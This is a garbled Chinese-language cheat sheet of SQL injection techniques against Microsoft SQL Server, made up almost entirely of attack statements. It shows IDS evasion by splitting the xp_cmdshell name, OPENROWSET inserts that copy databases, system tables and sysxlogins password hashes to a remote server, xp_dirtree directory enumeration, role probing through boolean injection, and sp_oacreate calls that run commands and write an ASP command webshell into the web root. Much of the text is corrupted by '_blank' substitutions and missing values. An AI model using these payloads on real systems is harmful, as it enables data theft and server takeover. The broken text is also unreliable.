【正文】
組][獲得數(shù)據(jù)表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]update 表名 set 字段=(select top 1 col_blank_name(object_blank_id(要查詢的數(shù)據(jù)表名),字段列如:1) [ where 條件]繞過IDS的檢測[使用變量]。declare a sysname set a=xp+_blank_cm’+’dshell exec a dir c:\ 開啟遠程_blank數(shù)據(jù)庫基本語法select * from OPENROWSET(SQLOLEDB, server=servername。pwd=123, select * from table1 )參數(shù): (1) OLEDB Provider name 其中連接字符串參數(shù)可以是任何端口用來連接,比如select * from OPENROWSET(SQLOLEDB, uid=sa。Network=DBMSSOCN。, select * from table數(shù)據(jù)庫insert所有遠程表到本地表。uid=sa。實際運用中適當修改連接字符串的IP地址和端口,指向需要的地方,比如:?1234567insert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from table1) select * from table2insert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from _blank_sysdatabases)select * from insert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from _blank_sysobjects)select * from user_blankinsert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from _blank_syscolumns)select * from user_blank復制_blank數(shù)據(jù)庫:insert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from table1) select * from database..table1insert into OPENROWSET(SQLOLEDB,uid=sa。Network=DBMSSOCN。,select * from table2) select * from database..table2復制哈西表(HASH)登錄_blank密碼的hash存儲于sysxlogins中。pwd=123。Address=,1433。遍歷目錄的方法: 先創(chuàng)建一個臨時表:temp?123456789。–。– 獲得當前所有驅(qū)動器。– 獲得子目錄列表。– 獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中。– 查看某個文件的內(nèi)容。–。–。insert into temp(id,num1) exec _dirtree c:\。–語句2:and 1=(Select IS_blank_SRVROLEMEMBER(serveradmin))。–語句4:and 1=(Select IS_blank_SRVROLEMEMBER(securityadmin))。–語句6:and 1=(Select IS_blank_SRVROLEMEMBER(diskadmin))。–語句8:and 1=(Select IS_blank_SRVROLEMEMBER(bulkadmin))。–?1234567。insert dirs exec _dirtree c:\–and 0(select top 1 paths from dirs)–and 0(select top 1 paths from dirs where paths not in(Inetpub))–。insert dirs exec _dirtree e:\web–and 0(select top 1 paths from dirs1)–把_blank數(shù)據(jù)庫備份到網(wǎng)頁目錄:下載?123456789101112131415161718192021222324252627282930313233343536373839404142。 set a=db_blank_name()。–and 1=(select user_blank_id from USER_blank_LOGIN)and 0=(select user from USER_blank_LOGIN where user1) declare o int exec sp_blank_oacreate , o out exec sp_blank_oamethod o, run, NULL, –declare o int, f int, t int, ret intexec sp_blank_oacreate , o outexec sp_blank_oamethod o, createtextfile, f out, c:\inetpub\root\, 1exec ret = sp_blank_oamethod f, writeline, NULL,% set o = (“”): ( (“cmd”) ) %。xp_blank_dirtree適用權(quán)限PUBLICexec _dirtree c:返回的信息有兩個字段subdirectory、depth。create table dirs(paths varchar(100), id int)建表,這里建的表是和上面 xp_blank_dirtree相關(guān)連,字段相等、類型